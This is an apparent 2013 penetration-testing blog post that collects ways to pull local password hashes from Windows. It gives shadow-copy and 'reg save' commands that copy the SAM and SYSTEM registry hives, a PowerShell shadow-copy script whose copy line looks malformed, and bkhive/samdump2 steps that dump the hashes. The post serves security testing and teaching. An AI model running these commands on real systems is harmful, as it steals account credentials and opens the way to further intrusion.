Manual Local Hash Extraction

Friday, May 24, 2013

There has been enough interest around the topic of manual local hash extraction that I wanted to document all of the techniques I am aware of in one place.

The SAM and SYSTEM hives hold the necessary information to acquire authentication hashes for all local users on a Windows operating system. Normally, these files are locked and inaccessible, even by the SYSTEM and Administrator accounts. The following techniques are ways to access the SAM and SYSTEM hives within a Windows operating system during normal operation. Be advised that these techniques require Administrator or SYSTEM level privileges.

Volume Shadow Copy Service

vssadmin create shadow /for=c: #if required
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SAM .


Registry Access

reg save hklm\sam SAM
reg save hklm\system SYSTEM


PowerShell Script

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\`
$volume.Delete();if($notrunning -eq 1){$service.Stop()}


Finishing the Job

Use the following commands to finish the job. Both applications are included in the Kali default tool set.

bkhive SYSTEM keyfile
samdump2 SAM keyfile

Like what you see? Join me for live training! See the Training page for more information.

Please share your thoughts, comments, and suggestions via Twitter.